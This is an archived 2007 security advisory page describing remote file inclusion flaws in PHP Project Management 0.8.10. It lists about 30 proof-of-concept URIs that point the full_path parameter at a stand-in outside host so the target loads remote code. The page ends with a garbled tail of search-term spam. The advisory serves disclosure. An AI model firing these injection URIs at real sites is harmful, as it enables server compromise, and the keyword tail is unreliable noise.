about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHP Project Management Multiple Remote File Include Vulnerabilities


Title PHP Project Management Multiple Remote File Include Vulnerabilities
Published 2007-10-21-12:00AM
Updated 2007-10-24-07:36PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  GoLd_M discovered this vulnerability.
Vulnerable  PHP Project Management PHP Project Management 0.8.10
Not Vulnerable  
Code  An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/modules/certinfo/index.php?full_path=http://www.example2.com
http://www.example.com/modules/emails/index.php?full_path=http://www.example2.com
http://www.example.com/modules/events/index.php?full_path=http://www.example2.com
http://www.example.com/modules/fax/index.php?full_path=http://www.example2.com
http://www.example.com/modules/files/index.php?full_path=http://www.example2.com
http://www.example.com/modules/files/list.php?full_path=http://www.example2.com
http://www.example.com/modules/groupadm/index.php?full_path=http://www.example2.com
http://www.example.com/modules/history/index.php?full_path=http://www.example2.com
http://www.example.com/modules/info/index.php?full_path=http://www.example2.com
http://www.example.com/modules/log/index.php?full_path=http://www.example2.com
http://www.example.com/modules/mail/index.php?full_path=http://www.example2.com
http://www.example.com/modules/messages/index.php?full_path=http://www.example2.com
http://www.example.com/modules/organizations/index.php?full_path=http://www.example2.com
http://www.example.com/modules/phones/index.php?full_path=http://www.example2.com
http://www.example.com/modules/presence/index.php?full_path=http://www.example2.com
http://www.example.com/modules/projects/index.php?full_path=http://www.example2.com
http://www.example.com/modules/projects/summary.inc.php?full_path=http://www.example2.com
http://www.example.com/modules/projects/list.php?full_path=http://www.example2.com
http://www.example.com/modules/reports/index.php?full_path=http://www.example2.com
http://www.example.com/modules/search/index.php?full_path=http://www.example2.com
http://www.example.com/modules/snf/index.php?full_path=http://www.example2.com
http://www.example.com/modules/syslog/index.php?full_path=http://www.example2.com
http://www.example.com/modules/tasks/searchsimilar.php?full_path=http://www.example2.com
http://www.example.com/modules/tasks/index.php?full_path=http://www.example2.com
http://www.example.com/modules/tasks/summary.inc.php?full_path=http://www.example2.com
http://www.example.com/modules/useradm/index.php?full_path=http://www.example2.com
http://www.example.com/ajax/loadsplash.php?full_path=http://www.example2.com
http://www.example.com/blocks/birthday.php?full_path=http://www.example2.com
http://www.example.com/blocks/events.php?full_path=http://www.example2.com
http://www.example.com/blocks/help.php?full_path=http://www.example2.com
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 16:16:51 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
XES www.events mina Teensex.co sll.cc www.comfis 2...Fmedia bunga citr 20tm4.cn mambo Remo mambo+Remo Www.sex.u. 2algeria hourse fuc www.indian WWW.SEXyph news for c WWW.arabic news searc sexxmax.co sex angeli Fickshun kerio www.pandam 200 /compo www.423433 Crack \r\n maxcpm.inf blu filim% coithienth Wal.sex ?????? ??? news for c Dewipersik Zen Cart. Www.shakil paris hilt linux kern www.nyblg. remote inc Free sexy 200 /compo WWW.Sexto indain mas Tamil+vide Microsoft WWW.Sexto 18 Year gi www.fcd518 pho